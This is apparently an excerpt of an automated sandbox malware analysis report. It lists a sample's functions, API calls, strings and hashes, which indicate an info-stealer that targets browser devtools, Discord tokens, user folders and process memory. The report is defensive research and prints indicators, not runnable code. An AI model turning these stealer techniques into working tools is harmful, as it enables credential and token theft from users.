                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004010BA
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420C52), ref: 004010CE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420F55), ref: 004010D6
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420C48), ref: 004010DE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420FB1), ref: 004010E6
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420C18), ref: 004010EE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420C52), ref: 004010F6
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420C50), ref: 004010FE
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0042035D,?,00420C50), ref: 00401106
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0042060F,?,0042035D,?,00420C50), ref: 0040110E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401116
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040111E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 00401126
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D,?,00420C50), ref: 0040112E
                                                                                                                                                                                                                                                                            • Part of subcall function 004108E0: GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                            • Part of subcall function 004108E0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                            • Part of subcall function 004108E0: GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 00401137
                                                                                                                                                                                                                                                                            • Part of subcall function 004108B0: GetProcessHeap.KERNEL32(00000000,?,00401148,?,00420C50), ref: 004108B2
                                                                                                                                                                                                                                                                            • Part of subcall function 004108B0: HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401148,?,00420C50), ref: 004108C0
                                                                                                                                                                                                                                                                            • Part of subcall function 004108B0: GetUserNameA.ADVAPI32(00000000), ref: 004108D3
                                                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040114A
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00401162
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: lstrcat$Heap$Process$AllocNamememsetstrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2002865342-0
                                                                                                                                                                                                                                                                          • Opcode ID: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                          • Instruction ID: 34afd6592ec8d0e6f1858942ae0d643bae2899fd03f8c159827732ad67307064
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d711198b1f504583e68a46c82701488b5e9e546d10a23a30cfae441c6611febe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8113CA57813283AE12132223DC7FBF159C9F92BD9F90012AFA04740C3AA9DDD4650FE
                                                                                                                                                                                                                                                                          Function 00412E50 Relevance: 26.7, APIs: 4, Strings: 11, Instructions: 424stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                                                                                                          • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                          • API String ID: 3330995566-2422389115
                                                                                                                                                                                                                                                                          • Opcode ID: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                          • Instruction ID: af6f1e03352f6f9f1d8fae1c75086c49a28638e44c42a35a98b4b473fe3f47e4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a114e8b074fab81b471b136f835b17f48d344ad7e93d13b1cd96e526f6e09b3c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E1AF70204308AFD324AF25D895FABB3A9BB44344F04445EFD179B292DB7CE985CB69
                                                                                                                                                                                                                                                                          Function 00412F60 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 374stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                                                                                                          • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$false$true$|
                                                                                                                                                                                                                                                                          • API String ID: 3330995566-2422389115
                                                                                                                                                                                                                                                                          • Opcode ID: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                          • Instruction ID: f18559b84add82ea06590c7feb2660792e730a2b0798f24fd2155c98f040b140
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72196c04082e31b8d357e3bc8e2834d2b1c11cdb15e9b60cc411853a91ef1fe6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91C1AF70604308AFD214AF25DC95FABB3A9BB44348F00445EFD179B292DB7CA985CB69
                                                                                                                                                                                                                                                                          Function 0041D190 Relevance: 18.2, APIs: 12, Instructions: 179filetimeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                          • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                          • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                          Function 00406BC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 115stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                            • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                            • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
                                                                                                                                                                                                                                                                            • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
                                                                                                                                                                                                                                                                            • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
                                                                                                                                                                                                                                                                            • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,?,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406C44
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memcpy$lstrcat$??3@memchrmemcmpmemmovememsetstrlen
                                                                                                                                                                                                                                                                          • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                          • API String ID: 3722098227-2676143373
                                                                                                                                                                                                                                                                          • Opcode ID: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                          • Instruction ID: 91c73b424bc1f2f560fb80e69d34ff2093765c111021dba20f9d1d410260af79
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6df93589ec94bd32190cbd0c7d779cd049acc16d756cf596e2cae93c0837182
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8731C9719002185BEB14AB65DC49BEFB775AF41308F41006EF506772C2DB7C1A85CBA9
                                                                                                                                                                                                                                                                          Function 0040F9B0 Relevance: 10.8, APIs: 7, Instructions: 265stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040F9BC
                                                                                                                                                                                                                                                                          • ??_U@YAPAXI@Z.MSVCRT ref: 0040F9DE
                                                                                                                                                                                                                                                                            • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F899
                                                                                                                                                                                                                                                                            • Part of subcall function 0040F890: strlen.MSVCRT ref: 0040F8D6
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040F9FE
                                                                                                                                                                                                                                                                          • VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0040FAA0
                                                                                                                                                                                                                                                                          • ReadProcessMemory.KERNEL32(?,?,?,00064000,00000000,?,?,00000000), ref: 0040FB5E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strlen$MemoryProcessQueryReadVirtualmemset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3741619940-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7d80f05e3eb858268aefd1387b3df29b4f95f1701483d4e33ac9b7678e618b59
                                                                                                                                                                                                                                                                          • Instruction ID: 5f3e5458c0cb4e82bdfb47d3dacbfc32efe29669a25e4631f25e2303d30cacff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d80f05e3eb858268aefd1387b3df29b4f95f1701483d4e33ac9b7678e618b59
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0A159716083018BD328DF24D891A3BB7E2FF94704F14893EE58697791E738E849CB5A
                                                                                                                                                                                                                                                                          Function 0041D590 Relevance: 9.1, APIs: 6, Instructions: 118timeCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                          • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                          • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                          Function 00402520 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3928403917-0
                                                                                                                                                                                                                                                                          • Opcode ID: e7e14c953d7065ddfbc83dcc624144d79b7d133a95972969d59e1279a8bc6929
                                                                                                                                                                                                                                                                          • Instruction ID: 52b5ec612f7533a417f76914090347e108d7196820fc58126e476e1f6b56743e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7e14c953d7065ddfbc83dcc624144d79b7d133a95972969d59e1279a8bc6929
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 152107B26006011BCB24AE7D9E9842FB7E9DF953107150B3FF452D77C1E6B9D884829D
                                                                                                                                                                                                                                                                          Function 004153A0 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 252COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004153BA
                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004153D0
                                                                                                                                                                                                                                                                            • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                            • Part of subcall function 004078F0: lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                            • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                            • Part of subcall function 00407790: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0040402F,00000000,?,?,?,?,?,?,?), ref: 0040779E
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrlenmemset$AllocAttributesCreateLocalRead
                                                                                                                                                                                                                                                                          • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                          • API String ID: 3104403827-2067953968
                                                                                                                                                                                                                                                                          • Opcode ID: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                          • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                          Function 004132F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146stringCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                                                                                                          • String ID: block$|
                                                                                                                                                                                                                                                                          • API String ID: 3330995566-542838162
                                                                                                                                                                                                                                                                          • Opcode ID: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                          • Instruction ID: ce61686c9be415db56d3220093c378b95acedfbe19f9b6f22c8a3ac929646854
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecc07da542351b61a2a8a4774e87802483488a317800a8c08075238e61b330b3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03516FB0308708AFD7209F26D849B9BB7A9FB1174AF10440BEC1397290DB7DD6C58A5D
                                                                                                                                                                                                                                                                          Function 0040F780 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,?,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                          • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2770513290.0000000000637000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                          • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                          • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                          • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
